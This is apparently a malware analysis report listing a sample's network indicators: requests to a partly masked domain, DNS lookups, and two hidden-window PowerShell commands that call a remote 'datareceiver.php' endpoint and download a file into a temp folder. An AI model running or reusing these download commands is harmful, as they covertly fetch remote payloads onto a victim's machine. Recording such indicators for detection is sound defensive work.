Technical Information
- http://de######ershousesavers.com/datareceiver.php?ho####################################################### pm&stage=1
- http://de######ershousesavers.com/kjldfxkjsm as %temp%\mmmzgytzsj\ign44ec.tmp
- 'de######ershousesavers.com':80
- 'de######ershousesavers.com':443
- 'microsoft.com':80
- http://de######ershousesavers.com/datareceiver.php?ho####################################################################
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://de######ershousesavers.com/kjldfxkjsm
- 'de######ershousesavers.com':443
- DNS ASK de######ershousesavers.com
- DNS ASK microsoft.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "& {(New-Object System.Net.WebClient).DownloadString('http://de######ershousesavers.com/datareceiver.php?ho####################################################### PM&stage=1')}"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://de######ershousesavers.com/kjldfxkjsm','%TEMP%\MMMZGYTZSJ\IGN44EC.tmp')}"' (with hidden window)